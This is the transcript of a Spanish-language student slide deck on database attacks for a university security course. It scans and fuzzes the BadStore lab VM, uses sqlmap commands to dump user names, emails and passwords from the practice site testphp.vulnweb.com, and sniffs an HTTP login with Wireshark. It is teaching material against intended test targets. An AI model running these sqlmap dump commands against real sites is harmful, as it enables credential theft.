Ataques a bases de datos
-
Upload
fernando-hernandez -
Category
Engineering
-
view
200 -
download
2
Transcript of Ataques a bases de datos
![Page 1: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/1.jpg)
ATAQUES A BASES DE
DATOSComponente Práctico 1
Arnulfo Fernando Hernández Daza
Seguridad en bases de datos, Universidad Nacional Abierta y a Distancia-UNAD
Tauramena, Colombia
![Page 2: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/2.jpg)
1. ATAQUE POR INYECCION DE CODIGO
SQL BASE DE DATOS BADSTORE
Lo primero que hacemos es instalar la base de datos en una máquina virtual; en
este caso utilizamos VMware.
![Page 3: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/3.jpg)
Para vulnerar la base de datos de Badstore utilizaremos Acunetix y Zed
attack proxy. Instalamos y configuramos entonces OWASP Zed.
![Page 4: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/4.jpg)
Configuro en mi navegador el proxy para enlazar las busquedas del
navegador con OWAS ZAP:
![Page 5: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/5.jpg)
En la carpeta de instalacion de OWAS ZAP, busco el archivo Config, y en la linea
del hostname establesco el mismo host que configure en el proxy del navegador:
127.0.0.1
![Page 6: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/6.jpg)
Descargamos e instalamos Acunetix para poder detectar las vulnerabilidades de
Badstore.
![Page 7: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/7.jpg)
Procedemos a la configuración de Acunetix:
Aquí le indico a acunetix la dirección que quiero que escanee en busca de
vulnerabilidades, es este caso será la dirección de Badstore,
http://192.168.204.130/.
![Page 8: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/8.jpg)
Y como se puede observar en la imagen siguiente, se comienza el escaneo de las
vulnerabilidades de Badstore con acunetix:
![Page 9: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/9.jpg)
Mientras se termina el escaneo podemos probar sobre un error hallado, el cross
site scripting de la siguiente manera:
![Page 10: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/10.jpg)
Ahora volvemos a Zed Attack y habilitamos el escaneo de badstore:
![Page 11: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/11.jpg)
Identificamos una amenaza para atacar:
![Page 12: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/12.jpg)
Aplico un Fuzz a la direccion vulnerable del sitio:
![Page 13: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/13.jpg)
Configuro el Fuzz:
![Page 14: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/14.jpg)
Podemos observar la informacion de algunos clientes:
![Page 15: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/15.jpg)
2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A
SITIO WEB http://testphp.vulnweb.com/.
Procedemos a instalar Python:
![Page 16: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/16.jpg)
Copiamos la carpeta de sqlmap en el disco donde
está instalado Python
![Page 17: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/17.jpg)
Desde la ventana de símbolo de sistema accedemos a
la carpeta que contiene los archivos sqlmap y
ejecutamos el comando para obtener la información
de la base de datos del sitio de BadStore:
> color f4
> cd sqlmap
![Page 18: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/18.jpg)
Para obtener información de la base de datos
buscamos primero una vulnerabilidad en la página
digitando el código = al final de la dirección y
observando el erros en la sintaxis de SQL.
![Page 19: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/19.jpg)
Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código
para obtener información:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
![Page 20: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/20.jpg)
Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza
el sitio:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
![Page 21: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/21.jpg)
Ahora buscaremos la información correspondiente a las tablas que muestra la
base de datos:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart –
tables
![Page 22: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/22.jpg)
Ahora busquemos la informacion de las columnas de las tablas:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --
columns
![Page 23: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/23.jpg)
Ahora podemos averiguar los datos de alguna columna de la tabla users, con el
siguiente codigo:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --
columns –T users –C name
![Page 24: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/24.jpg)
Extraemos el contenido:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --
columns –T users –C name –dump
![Page 25: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/25.jpg)
Averiguamos el correo:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --
columns –T users –C email –dump
![Page 26: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/26.jpg)
Busquemos la contraseña:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --
columns –T users –C pass –dump
![Page 27: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/27.jpg)
Ahora el usuario:
Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --
columns –T users –C uname –dump
![Page 28: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/28.jpg)
Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y
verificamos que los datos obtenidos son reales:
![Page 29: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/29.jpg)
3. ATAQUE POR SNIFFING
Para el ataque por sniffing utilizaremos el software de Wireshark.
Descargamos e instalamos en nuestro equipo el software:
![Page 30: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/30.jpg)
Una vez instalado el software de Wireshark procedemos a configurarlo y
utilizarlo para nuestro análisis:
![Page 31: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/31.jpg)
Abrimos el menu Capture, damos clic en opciones y seleccionanos
nuestra tarjeta de red y le damos iniciar escaneo de red:
![Page 32: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/32.jpg)
De esta forma se incia el escaneo del trafico en la red:
![Page 33: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/33.jpg)
Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo
http; en este caso utilizaremos una cuenta de www.directoriow.com:
![Page 34: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/34.jpg)
Una vez logueados en el sitio con nuestros datos procedemos a usar Wireshark. Lo primero es dar clic en el botón Expression y escoger la opción HTTP – Hypertext transfer protocolo.
![Page 35: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/35.jpg)
Dentro del menú de opciones damos clic en http.request.method.
![Page 36: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/36.jpg)
Luego de esto buscamos la ip que destino que corresponde al sitio
de www.directorio.com, que en este caso es 95.211.231.44.
![Page 37: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/37.jpg)
Una vez identificada la ip podermos filtrar todo el trafico
correspondiente a este sitio con el comando ip.addr==95.211.231.44.
![Page 38: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/38.jpg)
Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del
usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded
podemos encontrar la información de usurario y contraseña que estamos buscando.
![Page 39: Ataques a bases de datos](https://reader033.fdocuments.ec/reader033/viewer/2022052204/55ab0e6e1a28ab920c8b48c3/html5/thumbnails/39.jpg)
REFERENCIAS
Recuperado:
https://www.youtube.com/watch?v=-C9TEBIfyrg
Recuperado:
http://rootear.com/seguridad/utilizando-sqlma
Recuperado:
https://www.youtube.com/watch?v=OPhqJTBGZsw
Recuperado:
http://www.hacktimes.com/sql_injection_con_sqlmap/